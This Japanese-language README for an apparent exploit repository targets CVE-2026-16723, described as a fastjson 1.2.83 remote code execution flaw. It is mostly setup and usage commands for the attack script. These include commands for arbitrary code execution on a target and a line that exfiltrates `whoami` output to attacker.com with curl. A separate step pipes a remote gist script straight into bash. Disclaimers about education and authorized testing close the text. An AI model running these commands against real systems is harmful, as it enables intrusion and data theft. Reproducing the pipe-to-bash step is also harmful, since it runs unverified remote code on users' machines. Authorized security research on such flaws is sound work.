
UpdatedAug 2, 2026
CVE-2026-16723 — Updated!
CVE-2026-16723
CVE-2026-16723
寄付
PayPalまたは下のQRコードをスキャンして、このプロジェクトの維持をサポートしてください。
⚡ 簡単な使い方
このプロジェクトは、以下のような安全かつ許可された環境でのみ使用してください:
- ローカル仮想マシン
- Dockerコンテナ
- 隔離されたラボ環境
- 許可されたペネトレーションテスト環境
セットアップ例:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
使用例:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
注意:
- 他のプロジェクトからクローンする場合、ネストされたディレクトリ内の
.gitをクリアするためにcurl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -yを実行する必要があります。 - 例:cve-2025-46822.sh、cve-2025-46822-lab.sh、...
クレジットまたは参考
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 教育用セキュリティ研究リポジトリ
管理された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。
⚠️ セキュリティおよび法的免責事項
目的
このリポジトリは、教育および許可されたセキュリティ研究のみを目的としています。
これは、ユーザーが以下について学ぶのを支援するために設計されています:
- セキュリティの脆弱性
- サンドボックスおよび分離の概念
- 安全なコーディングと防御的な実践
許可された使用のみ
このリポジトリは、許可を得た環境でのみ使用してください。例:
- 個人のラボまたは仮想マシン
- Dockerまたは隔離された環境
- 許可されたペネトレーションテスト
- サイバーセキュリティトレーニングまたは学術研究
許可のない、または違法な使用は固く禁止されています。
免責
作者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、または損失について責任を負いません。
このリポジトリを使用することで、以下に同意したものとみなされます:
- 自分の行動に対して責任を持つこと
- 法的かつ倫理的に使用すること
- このプロジェクトは保証なしで提供されること
倫理的な使用
このプロジェクトは、以下の目的を意図しています:
- 防御的なセキュリティ研究
- サイバーセキュリティ教育
- 脆弱性への認識向上
- 安全なシステムおよびソフトウェアの研究
責任ある情報開示の慣行に従い、適用されるすべての法律を遵守してください。
連絡先
責任ある情報開示や協力のためには、GitHubを通じてリポジトリのメンテナーに連絡してください。
